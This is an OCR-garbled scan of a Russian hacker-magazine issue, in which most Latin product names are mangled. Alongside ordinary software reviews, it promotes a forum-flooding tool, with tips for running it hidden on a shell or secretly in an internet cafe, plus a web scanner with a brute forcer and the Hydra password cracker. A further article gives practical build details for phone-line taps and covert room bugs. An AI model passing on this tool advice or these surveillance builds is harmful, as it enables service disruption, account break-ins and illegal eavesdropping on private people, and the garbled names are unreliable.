байтные йезкіор ЗісІеЬаг’ы и 
ОЬіесШаг’ы. Капа Іжіпсііег сочетает 
максимум возможностей при минимуме 
кода. На одну из сторон экрана програм- 
ма предлагает повесить плавающую па- 
нельку с иконками часто используемых 
приложений. На другой стороне Капа 
Іяипсііег советует закрепить легко наст- 



раиваемую систему меню. Ясное дело, 
и плавающая панель, и менюшка на эк- 
ране твоей машины появляются только 
тогда, когда ты подводишь курсор к со- 
ответствующему краю экрана (или на- 
жимаешь на «горячую» клавишу). Прихо- 
дится признать, что утилита Капа 
І_аипсІіег кое в чем даже превосходит 
мой любимый ВІІШ (разработка кото- 
рого, к сожалению, давным-давно прек- 
ращена). К примеру, она умеет запус- 
кать приложения целыми сериями. То 
есть одним кликом ты можешь сразу за- 
пустить все проги, которые необходимы 
тебе, скажем, для работы в Сети. При- 
чем, что приятно, эти проги не ломятся 
все разом, перегружая машину и мешая 



друг другу, а чинно 
стартуют одна за 
другой через неболь- 
шие промежутки 
времени, которые ты 
определяешь сам. В 
общем, ты можешь 
со мной не согла- 
ситься, но, на мой 
взгляд, эта прога 
точно такой же тизі 
Ііаѵе, как и другой 
продукт того же про- 
изводителя - мегау- 
добная напоминалка 
Капа Петіпсіег. 
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ѴУІІКІ0ИІ5 9х/Ме/ИТ/2к/ХР 

Ргееѵѵаге 
5іге: 164 КЬ 

Ь11р://$реІІег.іп1ег$.сот.ги 

П ростая реализация простой идеи. 

Универсальная отечественная 
программа для проверки орфогра- 
фии, паразитирующая на уже готовом 
движке - системе проверки орфогра- 
фии русского языка пакета М5 (Жісе. 
Офисный движок вооружает ЗреІІ 
СИескег хорошей словарной базой, 
написанной с учетом морфологии 
русского языка. Универсальность 
программы обеспечивается спосо- 
бом оповещения об ошибке - если 




ЗреІІ СИескег не может распознать 
набранное тобой слово, раздается 
звуковой сигнал, в углу экрана появ- 
ляется слово с ошибкой, а сам уголок 
окрашивается красным. Поскольку 
прога не пытается подчеркивать или 
как-то выделять ошибки и опечатки 
прямо в тексте, это положительно 
сказывается на ее совместимости. 
Проще говоря, этот ЗреІІ СИескег ра- 
ботает везде: и в окне чата, и в аське, 
и в нотпаде. В том случае, если конф- 
ликты с каким-либо софтом все же 
обнаружатся, то этот софт можно вы- 
вести из зоны действия ЗреІІ 
СЬескег’а (в настройках утилиты есть 
соответствующая опция). В принци- 
пе, главный и единственный недоста- 
ток этой проги заключается в том, что 
ЗреІІ СЬескег не показывает тебе, где 
именно в слове была допущена ошиб- 
ка. Хотя, ты знаешь, в этом даже есть 
какой-то плюс. Ведь не зря говорят, 
что профессиональные системы про- 
верки орфографии негативно влияют 
на грамотность. А с этим ЗреІІ 
СІіескег’ом снижение уровня грамот- 
ности тебе точно не грозит - ведь все 
свои ошибки тебе придется находить 
и исправлять самому :). 



КОРЕТЕ 10.8.4 * 




ЦІІНІІТН РЕІІ$ 13.2.3 





иапіа РІиз - открытая версия прод- 
винутого редактора для ѵѵеЬ-раз- 
работчиков в среде КОЕ, основанная 
на библиотеке 01. Авторы программы 
явно не стесняются откровенно гово- 
рить о своей ключевой задаче - соз- 
дать «лучший инструмент веб-разра- 
ботки в мире», и у них есть на то при- 
чины: возможностей у продукта ог- 
ромное множество. Редактор спосо- 
бен грамотно работать с различными 
стандартами НТМІ_ от консорциума 
ШС, ХМІ_, С532, а также имеет 
собственный ХЗІТ йеЬиддег и отлад- 
чик РНР (правда, последний временно 
отсутствует, т.к. будет полностью пе- 
реписан и появится в ближайших ре- 



лизах Оиапіа РІиз). Модификация кода 
проходит в различных режимах: обыч- 
ный редактор с подсветкой синтакси- 
са, визуальный (т.н. ѴѴУЗІѴѴУС) и сов- 
мещение обоих (код изменяется для 
элементов, выбранных в визуальном 
представлении документа). Разумеет- 
ся, в программе есть разнообразные 
шаблоны для простого и быстрого 
создания нужного кода (они разбиты 
на стандартные, шрифты, таблицы, 
списки, формы и прочие, где, в част- 
ности, представлен специальный мас- 
тер фреймов и отдельный редактор 
С352). Дополнительные окна позволя- 
ют быстро получать подробную ин- 
формацию буквально о каждом теге. 
Для того чтобы не тратить лишнее 
время на подгонку страницы под раз- 
ные браузеры, в Оиапіа РІиз встроены 
комбинации клавиш для просмотра 
результата в Копциегог, МогіІІа, 
ІМеІзсаре, Орега, Іупх. Налажена рабо- 
та с внешними 
утилитами - нап- 
ример, проверка 
орфографии с по- 
мощью КЗреІІ и 
правильности син- 
таксиса с по- 
мощью Іісіу дела- 
ется одним кли- 
ком. 

* Пользователи ѴѴіпсІоѵѵз 
могут воспользоваться 
платной версией Оиапіа 
(Ж 





К ореіе - клиент обмена сообще- 
ниями для КОЕ (несмотря на это, 
его иконка прекрасно функционирует 
и в трее СІМОМЕ), написанный на 01 
и созданный как система, основан- 
ная на дополнениях. Все поддержи- 
ваемые протоколы - ІСО, ^Ыэег, АІМ, 
М5ІМ, ѴаЬоо, ІРС, ОасІиСасІи и 5М5 - 
являются ріидіп'ами и могут быть по 
отдельности убраны из установки 
или настроены. Кроме того, есть и 



дополнительные модули вроде пере- 
водчика, способного работать и с 
входящими, и с исходящими сооб- 
щениями через Ооодіе в режиме 
опііпе. Полностью конфигурируется и 
внешний вид: помимо стилей для ок- 
на разговора (с заготовками из попу- 
лярных приложений типа МЗМ и X- 
СІпаІ), есть коллекции смайликов (да- 
же из рЬрВВ). Расширена возмож- 
ность установки «горячих» клавиш, 
вплоть до того, что можно почти 
мгновенно изменять цвет фона в ди- 
алоге общения. Внешний вид вполне 
стандартен и не нуждается в допол- 
нительном изучении при переходе с 
любого из аналогов. 




^ ШТНМВ0Х II 0.8.5 




РОЗІХ (*В$0, Ипих, Зоіагіз...) 
$і?е (в М):1745 КЬ 
мшЬуІЬтЬошд 
Лицензия: 6№ 6Р1. 



В ИуІИтЬох - музыкальный проиг- 
рыватель и менеджер для 
СИМОМЕ. Внешний вид программы 
сделан в стиле одного из самых изве- 
стных продуктов Арріе - іТипез. Осно- 
ву для воспроизведения в ВІіуІІітЬох 
составляет ОЗІгеатег, который, нес- 
мотря на свой небольшой объем, 
обеспечивает солидную базу подде- 
ржки аудиоформатов. Помимо непос- 
редственного проигрывания музы- 
кальных композиций, ВІіуІІітЬох вы- 



полняет функции менеджера - весь 
его интерфейс рассчитан на то, что 
программа будет использоваться для 
управления и удобной работы с боль- 
шими коллекциями трЗ/одд. По 
умолчанию все добавляемые файлы 
сразу же сортируются по двум крите- 
риям браузера (который может быть 
скрыт): исполнители и альбомы (так- 
же могут быть добавлены жанры), а в 
более подробном окне выводятся со- 
ответствующие запросу песни. Вывод 
нужной информации об отображае- 
мых песнях настраивается, присут- 
ствует поиск. Поддерживаются 
ріауіізі'ы и интернет-радио. Програм- 
ма не перегружена излишествами и 
быстро работает. 







ШРПТШ 8 
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П рограмма НедРип имеет славную 
историю. Одной из первых ее 
версий я пользовался еще во време- 
на ѴѴіпсІоѵѵз 95. Неудивительно, что за 
столько лет своего развития (разра- 
ботка ВедВип никогда не прекраща- 
лась надолго) утилита смогла превра- 
титься в самый папский инструмент 
для зачистки системы от незаконно 
прописавшихся в ней программ-па- 
разитов. РедРип позволяет держать 
под контролем весь софт, автомати- 
чески стартующий при загрузке вин- 
дов, включая системные службы и 
ѴхР-драйверы. При этом наведению 
порядка на машине изрядно способ- 



ствует встроенная база данных по 
приложениям, позволяющая юзеру 
отличить нужный файл от непроше- 
ного засланца. Также в проге реали- 
зованы специализированные меха- 
низмы для вычесывания зруѵѵаге, ра- 
боты с реестром и оптимизации про- 
цесса загрузки оси. Любопытным (и 
опытным) товарищам должна осо- 
бенно приглянуться функция Тгоіап 
Апаіузег, позволяющая легко проко- 
нтролировать действия подозритель- 
ной проги. 

Программе ВедВип найдется приме- 
нение и после зачистки системы от 
мусора. Ее резидентные модули 
Шсіі йод, Рііе Ргоіесііоп и Іпіесііоп 
Реіесіог могут отслеживать все изме- 
нения, вносимые в списки автозагру- 
жаемых прог, реестр и системные 
файлы, сообщать о них юзеру и, если 
требуется, делать откат. 

Кроме ОоІсІ-версии (описание боль- 
шей части фишек которой попросту 
не влезло в это короткое резюме), на 
сайте программы находятся и слегка 
урезанные дистрибутивы РгоТеззіопаІ 
и ЗІапсІагсІ. Так что если размер и 
чрезмерная функциональность «золо- 
той» версии тебя не порадуют, ты без 
труда сможешь подобрать себе дист- 
рибугивчик по росту. 





З та софтина не позволит вредонос- 
ной программе проникнуть в твою 
систему. Теперь даже свежий экспло- 
ит для Ослика не поможет твоему зак- 
лятому врагу протроянить тебя и ук- 
расть все деньги с ВебМаней и крутые 
четырехзначные (да знаю я, что их не 
бывает, знаю!) аськи. Но если злопад- 
лотварь все же каким-то образом за- 
пустится, то все ее темные действия 
ты очень скоро вычислишь, так как 
«Патруль» мониторит твою систему от 
и до. Отслеживает и жестоко расправ- 



ляется с различными шпионскими мо- 
дулями и вредоносными прогами типа 
(АсІ/5ру)ѵѵаге. Под контроль програм- 
мы попадает область загрузки, сис- 
темные папки и реестр. 

Также софтина имеет встроенный ку- 
кис-редакгор, менеджер автозагрузки 
и запущенных процессов. Чтобы из- 
менить ассоциативность файлов и 
приложений, теперь не нужно лазить 
по настройкам Винды - это можно 
сделать здесь! Очень рекомендую эту 
программу и считаю ее одной из са- 
мых продвинутых и профессиональ- 
ных. А еще у этой тулзы очень смеш- 
ной значок в трее - черная собачка, 
похожая на смешную лошадку. По на- 
курке над ней можно ржать хоть час ;). 







Н аикрутейшая хакерская тулза для 
вывода из строя форумов путем 
жесткого закидывания сообщениями. 
Была разработана известными турец- 
кими хакерами, а впоследствии ис- 
пользована неизвестными турецкими 
ламерами, которые попытались объ- 
явить войну крупным русским он- 
лайн-бордам. И поначалу им это да- 
же удалось, жертвами стали 
шѵшагаіака.ги и несколько других из- 
вестных русских проектов. Впрочем, 
мазафаковцы быстро оправились и 
не только дали достойный отпор од- 
нообразным атакам турков, но и до- 



работали их флудилку, превратив ее 
в смертельное оружие. 

Возможности программы настолько 
обширны, что разбегаются глаза, вы- 
валивается язык и отвисает челюсть. 
Можно банально вписать ШІ_ ветки 
форума и нажать Ьаипсіі, но можно 
также настроить все вручную, вплоть 
до кукисов, посылаемой версии бра- 
узера и много чего еще. Софтина со- 
держит в себе МАИ-сервер, благода- 
ря чему может автоматически подт- 
верждать регистрацию нового юзера 
на форуме, присланную на мыло 
(почтовый адрес «печеньки»), и сде- 
лать Ігасегоиіе. Ну а возможность 
скрытой работы позволит тебе зака- 
чать эту хак-прогу на виндовый шелл 
или по-тихому оставить в интернет- 
клубе. С админом клуба, если что, 
разбирайся сам ;). 




Н еприятная новость: 6-І_оск 

ЗратСотЬаІ, пожалуй, лучшая 
программа для проверки почтовых 
ящиков и убиения непрошеной кор- 
респонденции прямо на сервере, ста- 
ла требовать денег за свою работу. 
Если раньше эта софтина была пол- 
ностью Тгее, то теперь на халяву она 
согласна мониторить лишь один 
РОРЗ/ІМАР аккаунт. Впрочем, в пере- 
ходе программы на коммерческие 
рельсы есть и хорошая сторона - но- 
вые версии 0-1_оск ЗратСоплЬаІ нын- 
че выходят одна за другой :). И без 
того нехилая прога становится все 
круче. Ее интерфейс настраивается в 
широких пределах, позволяя убирать 
с экрана ненужные тебе элементы. 
Система фильтров С-І_оск 
ЗратСотЬаі была в последнее время 
серьезно доработана. Теперь прога 



учится на всех письмах, которые ты 
отправляешь в Ігазіі (и даже показы- 
вает на красивом графике величину 
сэкономленного с ее помощью тра- 
фика :)). 

Если ты (Моек ЗратСотЬа! до этого 
ни разу не юзал, имей в виду, что эта 
утилита в первую очередь предназна- 
чена для тех, чьи почтовые ящики 
каждый день испытывают очень серь- 
езный наплыв рекламной корреспон- 
денции, и кто в этой связи нуждается 
в средстве для автоматического ее 
уничтожения. При этом С-І_оск 
ЗратСотЬаІ лишен главного недос- 
татка автономных фильтров - убитые 
им письма не исчезают бесследно, а 
сохраняются в корзине программы 
(точнее, сохраняются первые 20-50 
строчек каждого письма, которые С- 
І_оск ЗратСоплЬа* загружает для ана- 
лиза). И если юзеру кажется, что 
фильтры проги работают как-то не 
так, он всегда может в эту корзину 
заглянуть. Естественно, наличие та- 
кой возможности приводит к тому, 
что пользователь начинает активнее 
использовать все дос- 
тупные ему способы 
фильтрации. Вот тут- 
то и приходит ему на 
помощь встроенная в 
Сі-І_оск ЗратСотЬа* 
функция ведения чер- 
ного и белого списков 
(по заголовку, теме, 
ІР-адресу), НТМЬва- 
лидатор и фильтры, 
работающие на осно- 
ве 0М5ВІ_ ^N3 ВІаск 
Шзіз - черные списки 
доменных имен интер- 
нета) и по Байесу. 







П ознакомься, у тебя теперь новый 
постоянный жилец на жестком 



диске. Его рабочая деятельность зак- 
лючается в тестировании веб-прило- 
жений (твоя домашняя пага - это тоже 
веб-приложение!) на все известные 
разработчикам косяки. Здесь опций и 
настроек ОЧЕНЬ много. Если ты круто 
шаришь в НТМІ_, то обязательно оце- 
нишь прогу по достоинству. 



Также софтина в состоянии проверить 
веб-сайт на уязвимости, а их в базе 
больше сотни. Имеется и СОІ-сканер 
с не менее крупной базой. И я уж ни- 
как не могу не упомянуть о встроен- 
ном брутфорсере, хоть и стыдно - в 
этом выпуске уже один есть :). 



Помимо всего этого, АссеззРіѵег на- 
делен рядом хакерских возможнос- 
тей: посылка поддельных кукисов, 
осуществление сформированных то- 
бой РОЗТ-запросов и многое другое. 
Кстати говоря, это одна из тулз, ис- 
пользовавшихся хакером в нашумев- 
шей статье «Взлом МаіІ.Ви». 
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П о версии 2.0 обновился 30 ѴѴогІб 
Мар, один из лучших виртуаль- 
ных глобусов на сегодняшний день. 
Пожалуй, лишь программа Кеуітоіе 
(ѵш.кеуУе.сот) способна выдать на 
экран более эффектную картинку, да 
и то лишь за счет постоянной подг- 
рузки из Сети детализированных аэ- 
ро- и фотоснимков. С другой сторо- 
ны, даже в Кеуітоіе в качестве модели 



Земли выступает обычный шар, обтя- 
нутый текстурой, в то время как прог- 
рамма ЗР ѴѴогІб Мар предлагает 
пользователю по-настоящему слож- 
ный трехмерный объект, радующий 
глаз своей рельефной поверхностью, 
на которой прекрасно просматрива- 
ются горы, равнины и океанские впа- 
дины. Само собой, виртуальный гло- 
бус полностью интерактивен. В новой 
версии программы была обновлена 
база по городам и странам и серьез- 
но переписан движок. Теперь ЗР 
ѴѴогІб Мар умеет работать не только в 
оконном режиме. При желании ты 
можешь расположить маленькую 
трехмерную Землю поверх 
всех окон. Именно эта фи- 
шечка понравилась мне в 
новой версии больше все- 
го: порой так приятно бы- 
вает оторваться от работы, 
послушать музыку (в прогу 
встроен проигрыватель 
трЗ-файлов) и покрутить 
мышкой родную планету, 
выбирая места, где в дан- 
ный момент тебя любимо- 
го особенно сильно не хва- 
тает :). 






Н екоторые читатели катят на меня 
бочку, почему, дескать, в ][-тул- 
зах описываются только программы 
под Вынь? А ведь действительно, по- 
чему это? Исправляюсь: Нубга - 
мультиплатформенный проект, так 
что побрутфорсить смогут и юниксо- 
иды, и простые смертные, отдавшие 
предпочтение операционке от Мелко- 
мягких. Да, Гидра - это очень попу- 



лярный универсальный подборщик 
паролей к множеству сервисов: 
ЗатЬа, РТР, РОРЗ, ІМАР, Теіпеі, 
НТТР, НТТР5, НТТР-РВОХѴ, ЮАР, 
ИИТР, МуЗОЦ ѴІЧС, 100, 50СК55, 
5МТН-АІІТН, РСИРЗ, 5АР/РЗ, Сізсо 
(аиііі, епаЫе, ААА). Также имеется 
поддержка 55І_ и Меззиз'а - и это еще 
далеко не все! Поддерживается под- 
борка сразу к нескольким сервисам - 
куда ж без этого, однопоточные пере- 
борщики ушли в прошлое. 

Последнее обновление программы 
было в августе этого года. И я думаю, 
что выйдет еще не один новый билд, 
что не может не радовать. 
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наше время всякий может оказаться под колпаком не только у Большого Братеппо, но и у младших братьев - от частных сыскных 
агентств до соседа или супруги. Теория и практика шпионских технологий шагают по миру семимильными шагами. Тех беспечных, 
что не воспринимают угрозу всерьез, берут тепленькими и расслабленными. 



ПРОСТЫЕ СОВЕТЫ ПО РПЗВЕПЕНИЮ ЖУЧКОВ 



е спеши листать дальше, даже 
если никогда не держал в руках 
паяльника. Туманных представ- 
лений о физике из школьного 
курса для прочтения этого ма- 
териала будет достаточно. А ес- 
ли во сне тебе является соблаз- 
нительная лаборантка, сегодня 
у тебя все шансы наладить с ней отношения. 

Средства домашней разведки и радиоэле- 
ктронной борьбы - от тривиальных до ориги- 
нальных - можно найти на радиорынках. Об- 
ладая минимальными навыками «рукоде- 
лия», многие вещи легко изготовить самос- 
тоятельно. Инструкции искать недолго. 

На сайтах в интернете выложен стандартный 
вредительский набор: радиожучки, телефон- 
ные закладки, средства прослушивания ли- 
нии и помеховые устройства. Под видом 
противодействия подобным средствам их 
описания имеются в книжных магазинах. 
Классический набор принципиальных схем 
большим разнообразием не отличается 
и имеет, на мой взгляд, ряд недостатков. 

9 МЕНЯ зазвонил ТЕЛЕФОН 

В большинстве отечественных построек про- 
водка в распределительных коробах на лест- 
ничных площадках болтается как попало. Для 
прослушивания телефонной линии жучок-рет- 
ранслятор (рис. 1 ) включается в разрыв ми- 
нусового провода. Сигнал принимается на 
бытовой вещательный приемник в пределах 
нескольких десятков метров. Подобные жучки 
являются вечными, то есть не нуждаются в 
батарейках, что, конечно же, очень здорово. 





Источником питания для них служит напряже- 
ние в самой телефонной линии - 60 вольт. 

Вместе с тем, подключение к такой линии 
и маскировка жучка требуют специальных на- 
выков. Советская телефонная «лапша» - штука 
весьма хрупкая. К тому же, такое подсоеди- 
нение довольно просто обнаружить визуаль- 
но. Щупать провод в поисках жучков необяза- 
тельно. Они элементарно убиваются методом 
«прокачки» или «выжигания». Если ты подоз- 
реваешь, что тебя прослушивают, просто от- 
соединяешь свою линию от распределитель- 





ной коробки, отключаешь все телефоны, мо- 
демы, факсы и подаешь 220 вольт. Жучки 
враз кремируются. По наличию дымка можно 
узнать о местах их прежнего обитания. 

Бесконтактные индукционные датчики этих 
недостатков лишены. Они размещаются ря- 
дом с интересующей тебя линией. Особенно 
удобен такой вариант для мобильного ис- 
пользования. Не надо корячиться с подключе- 
нием. Поднес, послушал и ушел. Более того, 
подобным датчиком можно найти и прослу- 
шать даже скрытую в стене телефонную про- 
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водку. Конструкция проста до безобразия. Датчик представляет 
собой катушку с ферритовым сердечником от СВ-ДВ радиоприем- 
ника, на которую в навал намотана пара тысяч витков провода 
ПЭВ-0, 1 . К катушке подключены высокоомные головные телефоны 
типа ТОН-2, через которые, собственно, и ведется прослушивание 
на месте. Никаких батареек, понятное дело, не требуется. 

Если необходимо постоянное дистанционное прослушивание, 
понадобится передатчик-ретранслятор с батарейкой, что сильно 
ограничит время работоспособности жучка. Зато установить его 
проще простого, прилепив изолентой или пластилином. 

Защитить свою линию от индукционных датчиков можно, заме- 
нив «лапшу» на витую пару. Такая проводка не склонна излучать 
сигнал в пространство, а также цеплять внешние помехи и навод- 
ки. Твой модем скажет тебе большое спасибо за модернизацию. 

Л НЕТЕЛЕФОННЫЙ РПЗГ0В0Р 

Что нельзя доверить телефону, обсуждают шепотом при личной 
встрече. Радиожучок, миниатюрный передатчике микрофоном, или 
радиомикрофон - самая популярная шпионская разработка. Интер- 
нет и литература предлагают множество схем, которые реально 
сводятся лишь к нескольким типовым вариантам. 

Отбросим сразу все ненужное. Во-первых, как это ни парадок- 
сально звучит, для простых микроконструкций совершенно не ка- 
тят микросхемы. Для их питания, как правило, требуется не ме- 
нее 6 вольт. Даже если ты смастерил жучка, который можно разг- 
лядеть только в микроскоп, при наличии микросхемы к нему все 
равно придется прикрутить батарейку приличных размеров. Ра- 
диоблоха с таким грузилом плохо сочетается с нормальными 
представлениями о скрытности. 

Сложные схемы тоже оставим в покое. В принципе, конструкции 
на нескольких транзисторах и даже с кварцами можно сделать весь- 
ма миниатюрными. Однако те, для кого запах канифоли является 
родным не первый год, сами во всем разберутся. Остановимся на 
вещах, которые под силу практически каждому. 

Замечательная схема жучка с питанием от батарейки для часов 
представлена на рис. 2. Дальнобойность радиомикрофона - в райо- 
не 100 метров, продолжительность работы составляет около суток. 
ЧМ-сигнал принимается на любой вещательный УКВ-приемник. 

На рис. 3 показана схема еще более простого микропередатчи- 
ка с низковольтным питанием. В обеих конструкциях используется 
электретный микрофон типа МКЭ-3 или М1-Б2, позволяющий 
воспринимать шепот с расстояния в несколько метров. Антенной 
для передатчиков служит кусок провода длиной от 1 0 до 60 см, ко- 
торый несложно замаскировать. Все катушки бескаркасные - нес- 
колько витков провода ПЭВ-0, 3 с небольшим шагом. Подстройка 
частоты производится сжиманием и разжиманием витков. 

^завтрак аристократа 

Продолжительность жизни жучков, установленных на вражеской 
территории, ограничена источником питания. Миниатюрной бата- 
рейки может хватить на сутки непрерывной работы. В професси- 
ональном шпионаже радиомикрофоны подключают к электросе- 
ти, монтируя их в различные бытовые приборы - розетки, све- 



«Даже если у вас в самом деле паранойя, 
это еще не значит, что за вами никто 
не следит». 



Детектив Нат Пинкертон 
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• Жучков можно превратить в маленьких 
паразитов, сосущих энергию 
т прямо на месте. 




л Коллекция схем 
шпионской техники: 
тл/ѵ.Ьаскегзшз- 
зіа. ги/5ру/зру.рИр 




^Толковая книжка: 
Андрианов В. И., 
Бородин В. А., Со- 
колов А.В. «Шпио- 
нские штучки» и 
устройства для за- 
щиты объектов и 
информации. 
Справочное посо- 
бие. - СПб.: Лань, 
1996. 



Рисунок 4. Схема микроаккумулятора для жучка на 
фотоэлементах 
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Рисунок 5. Схема жучка- меломана 



тильники, датчики пожарной сигнализации. 
Для этого секретный агент, например, при- 
ходит в офис под видом электромонтера и в 
спокойной обстановке ставит свои закладки. 
Косить под мастера и ковыряться в розетках 
получится не у каждого, поэтому в большом 
ходу сегодня автономные жучки. Хоть они и 
не долгоиграющие, подложить их можно 
быстро и незаметно. В фильмах про шпио- 
нов такие радиомикрофоны обычно лепят 
под стол или сажают в цветочный горшок. 

Есть еще один способ продлить электрон- 
ным насекомым жизнь. Жучков можно прев- 
ратить в маленьких паразитов, сосущих энер- 
гию прямо на месте. Продукты питания для 
насекомых могут быть весьма разнообразны. 

А ФОТОСИНТЕЗ 

Первый вариант - кормежка светом, с ис- 
пользованием солнечной батареи. Жучков не- 
обходимо расположить возле окна или осве- 
тительных приборов. Букашки хорошо монти- 
руются под отражатель настольных ламп - ту- 
да мало кто заглядывает. Миниатюрные сол- 
нечные элементы можно выдрать из старого 
калькулятора или найти на радиорынке. Наш 
минимум навыков позволяет легко изготовить 
солнечную микробатарейку самостоятельно. 

Для этого необходимо добыть древние 
транзисторы в металлических корпусах. Воз- 
можно, их удастся купить на вес на том же ра- 
диорынке. Иначе придется ковыряться в ста- 



ром радиоприемнике, магнитофоне или теле- 
визоре. Кусачками, как показано на картинке, 
аккуратно отрываем шляпку и... все - фотоэ- 
лемент готов! Достаточно поднести его к лам- 
пе, как вольтметр покажет напряжение между 
базой и эмиттером. В зависимости от ориен- 
тации кристалла, большее напряжение иногда 
может оказаться между базой и коллектором. 

Из десятка расклепанных мною ископае- 
мых транзисторов разных типов набольшее 
напряжение удалось получить от П306. Он 
выдавал 0,5 вольта при освещении 40-ват- 
тной лампой с расстояния до полуметра. Бо- 
лее миниатюрные П309 и 2Т603 давали 0,4 и 
0,3 вольта соответственно, но их пришлось 
подносить ближе. Среднестатистический жу- 
чок жрет полтора вольта. Поэтому мы просто- 
напросто соединяем нужное количество само- 
пальных фототранзисторов в батарею. П306 
достаточно трех штук, при этом кристалл с 
выводами можно попробовать аккуратно от- 
пилить от громоздкого корпуса. Это сделать 
непросто, но если получится, то у тебя будут 
изумительно миниатюрные элементы. Как го- 
ворила на нашем первом свидании школьная 
физичка, последовательное соединение эмит- 
терных или коллекторных переходов сумми- 
рует общее напряжение батареи, а парал- 
лельное - увеличивает мощность источника. 

Чтобы продлить время работы в темноте, 
в отсутствие солнышка и при выключенных 
лампах, можно снабдить жучок микроаккуму- 
лятором, который будет подзаряжаться, пока 
есть свет (рис. 4). 

А Ж9ЧКИ-НЕП0МПНЫ 

Эти насекомые питаются звуком какого-либо 
гудящего агрегата, например компрессора 
холодильника. Колебания преобразуются в 
электричество дополнительным микрофоном 
с выпрямителем (рис. 5). Подсадить жучка 
желательно непосредственно на источник 
вибраций. При этом легко достигается мощ- 
ность источника питания в десятки милли- 
ватт, более чем достаточная для работы ра- 
диомикрофона. Низкочастотный гул отреза- 
ется фильтром передатчика и не мешает 
прослушиванию разговоров. 

А ЖУЧКИ-ППКОГОПИКИ 

Описания следующих альтернативных источ- 
ников энергии предлагаю, главным образом, 
для экспериментов и размышлений на тему 



«Пить или не пить». К вечным эти жучки не 
относятся, так как базируются на самых нас- 
тоящих продуктах питания, которые, как из- 
вестно, имеют свойство заканчиваться и 
просто тухнуть. На практике такие источники 
малоудобны, а вот продемонстрировать 
друзьям твою крутизну помогут. 

Во-первых, попробуем скормить жучку ово- 
щи и фрукты. Берем электроды - две монеты 5 
и 50 копеек - и вставляем их в яблоко. Напря- 
жение между электродами будет в районе по- 
лувольта. Оно может варьироваться в зависи- 
мости от кислости яблока и расстояния между 
монетами. Соединяя монеты попарно, имеем 
батарею. Результат будет интереснее, если 
скормить жучку лимон или соленый огурец. 

От закуски перейдем к напиткам. Между 
монетами делаем прокладку из туалетной бу- 
маги и вместе с проводами зажимаем их при- 
щепкой. Всю конструкцию погружаем... в пи- 
во! Не секрет, что эта жидкость обладает са- 
мым мощным энергетическим потенциалом. 
«Классическая Балтика N23» с парой монет 
выдала около 0,4 вольта. Темные сорта идут 
еще лучше, особенно бочковые без консер- 
вантов. Как бы кощунственно это ни звучало, 
но желательно, чтобы пиво было теплым. Из 
нескольких пар монет - насколько удастся 
раздвинуть пасть прищепке - можно составить 
батарею. Я проводил эксперименты с разны- 
ми монетами. Наилучший результат получился 
в комбинации 5 копеек + 1 британский пенни 
+ «Невское классическое». В общем, если те- 
бя упрекают в увлечении пивом, эксперимент 
наглядно покажет, какая энергетика в нем 
скрыта и как ты в ней нуждаешься :). 

Тему шпионских и антишпионских техноло- 
гий невозможно охватить в одной статье. Ког- 
да-нибудь мы обратимся к шпионским штуч- 
кам в духе хай-тека, а также рассмотрим 
простые в изготовлении средства радиоэле- 
ктронной борьбы и деструктивные прибамба- 
сы. Я планирую рассказать о шпионских имп- 
лантантах и дам практические советы, как мо- 
дернизировать свой собственный организм. 

В заключение сегодняшнего повествова- 
ния отмечу, что все приведенные описания 
идут под грифом «Сделай сам» исключитель- 
но для экспериментов в собственной кварти- 
ре. Боевое применение против посторонних 
лиц ограничено следующими руководствую- 
щими документами. 

Статья 137 УК РФ. Нарушение неприкос- 
новенности частной жизни. 

Часть 1 . Незаконное собирание или распро- 
странение сведений о частной жизни лица, 
составляющих его личную или семейную тайну. 

Статья 138 УК РФ. Нарушение тайны пе- 
реписки, телефонных переговоров, почто- 
вых, телеграфных или иных сообщений. 

Статья 139 УК РФ. Нарушение неприкос- 
новенности жилища. 

Часть 3. Незаконные производство, сбыт 
или приобретение в целях сбыта специаль- 
ных технических средств, предназначенных 
для негласного получения информации. 
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ДПГРЕЙДИМ СЕБЯ ПО СВЕРХЧЕЛОВЕКОВ 



0 се вокруг твердят тебе, что свой локоть не укусишь, свою тень не обгонишь и выше головы не прыгнешь. Но еще со времен Икара 
Ьошо заріепз не оставпяет попыток вырваться за пределы человеческих возможностей. Трансгуманисты говорят о необходимости 
перестройки человека изнутри при помощи био- и нанотехнологий. В это время перестают быть фантастикой экзоскепеты и другие 
костюмы супермена. Внешний апгрейд - настоящая находка для тех, кто еще не свыкся с перспективой стать киборгом. 




З кзоскелетами называют робо- 
тизированные костюмы, прев- 
ращающие обычных людей в 
настоящих силачей и скорохо- 
дов. Эти устройства обнаружи- 
вают напряжение мышц чело- 
века и передают команды на 
искусственные механические 
«мускулы». Они принимают на себя основ- 
ную нагрузку, тем самым увеличивая физи- 
ческую силу и выносливость человека. Час- 
то, надев экзоскелет, человек становится бо- 
лее прыгучим и быстрее движется. 

Примером природного экзоскелета явля- 
ется хитиновый панцирь у насекомых и чле- 
нистоногих. Человек о внешнем скелете 
серьезно призадумался только в средние ве- 
ка. Рыцарские доспехи служили надежной 
защитой, но были тяжелыми и сковывали 
движения. С развитием производства и во- 
енных технологий в середине прошлого века 
интерес к экзоскелетам снова вырос. Писа- 
тели-фантасты идею развили и все за уче- 
ных домыслили. 



А ЭКЗОСКЕПЕТЫ В ФПНТПСТИКЕ 

Роберт Хайнлайн в своем романе «Звездный 
десант» (1959) первым одел в экзоскелеты 
пехоту будущего. «Гориллы-гидроцефалы» в 



громоздком обмундировании играючи пры- 
гали через небоскребы, поливая противника 
огнем. Бронированные костюмы солдат 
представляли собой автономные системы 
жизнеобеспечения с запасами кислорода и 
питьевой воды. На шлеме был закреплен но- 
симый дисплей. На кнопки приходилось жать 
подбородком, а систему коммуникации акти- 
вировать закусыванием сенсора во рту. 




Затем были Железный человек и Доктор Дум 
из комиксов Стэна Ли. Из японских аниме 
и манга пришли гигантские боевые роботы- 
мехи. В фильме «Чужие» лейтенант Рипли, 
используя погрузчик СаІегріІІаг Р-5000, 
пришлепнула слюнявого шипящего инсекто- 
ида. И уже совсем недавно в третьей «Мат- 
рице» засветились пилотируемые защитные 
платформы. 

^ГРОНОЗЕКП ПРОСНУЛСЯ 

Любопытно, что в основу автопогрузчика из 
«Чужих» лег реальный экзоскелет Нагсіітап, 
разработка которого началась в 1 965 г. в 
компании СепегаІ Бесігіс. Конструкция 
должна была умножить силу оператора в 25- 
30 раз. Во время первых же испытаний 
Нагсіітап навел на окружающих тихий ужас. 
Человек прятался за тяжелыми металличес- 
кими балками и с трудом ворочал двумя 
гидравлическими клешнями. К 1970 году за- 
работала только одна рука. С ее помощью 
удавалось выжимать 300 кг веса. Но инжене- 
ры так и не решились оживить конструкцию 
